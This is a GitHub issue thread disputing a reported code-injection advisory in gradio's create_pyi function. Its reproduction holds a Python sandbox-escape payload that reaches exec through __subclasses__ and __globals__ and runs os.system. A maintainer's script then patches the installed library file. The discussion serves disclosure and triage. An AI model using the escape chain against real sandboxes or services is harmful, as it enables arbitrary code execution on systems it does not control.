Potential security vulnerability in create_pyi

[kmulka-bloomberg]

Describe the bug

According to this report, there is a security vulnerability in gradio. It looks like it has been in the wild without a patch for a few weeks.
GHSA-9v2f-6vcg-3hgv

Have you searched existing issues? 🔎

• I have searched and found no existing issues

Reproduction

import gradio as gr

# Define the events
events = ["on_load"]

pyi_code = gr.component_meta.create_pyi(''.__class__.__base__.__subclasses__()[139].__init__.__globals__['__builtins__']['exec']('import os; os.system("id")') , events)

Screenshot

No response

Logs

No response

System Info

4.38.1

Severity

Blocking usage of gradio

[abidlabs]

Hi @kmulka-bloomberg as far as I understand, this is not a real security vulnerability since it only affects a user who runs specifically crafted code that happens to use gradio library. But is someone is executing code from a third party, then they are already executing arbitrary code anyways, so the fact that jinja2 is injecting some code is not a real additional security threat. If I'm misunderstanding something, please let me know.

[kmulka-bloomberg]

@abidlabs Thanks for the response. I don't understand the ComponentMeta code enough to understand if user-contributed data (via the gradio web UI or API) would be fed to the create_pyi function. Maybe you could help me / others understand what the purpose of this function is and if it is possible user-contributed data could be passed through.

[kmulka-bloomberg]

Wondering if you or someone from the gradio team could dispute the creation of the CVE if you believe it is not a vulnerability.

[abidlabs]

We'll look into it. I'll reopen this issue for now

[abidlabs]

I used this form https://cveform.mitre.org/ to dispute the security vulnerability. I used this script to provide an alternate way where a user could simply monkeypatch the gradio library to produce a similar effect:

import os
import re

import gradio
gradio_dir = os.path.dirname(gradio.__file__)
components_file_path = os.path.join(gradio_dir, 'components.py')

with open(components_file_path, 'r') as file:
    file_contents = file.read()

pattern = r'(class Textbox\(.*?\):\s+def __init__\(self,.*?\):\s+)'
replacement = r'\1\n        print("Custom code executed: Textbox is being created")\n'

new_file_contents = re.sub(pattern, replacement, file_contents, flags=re.DOTALL)

with open(components_file_path, 'w') as file:
    file.write(new_file_contents)

print("gradio package has been modified. Custom code will now execute whenever Textbox is instantiated.")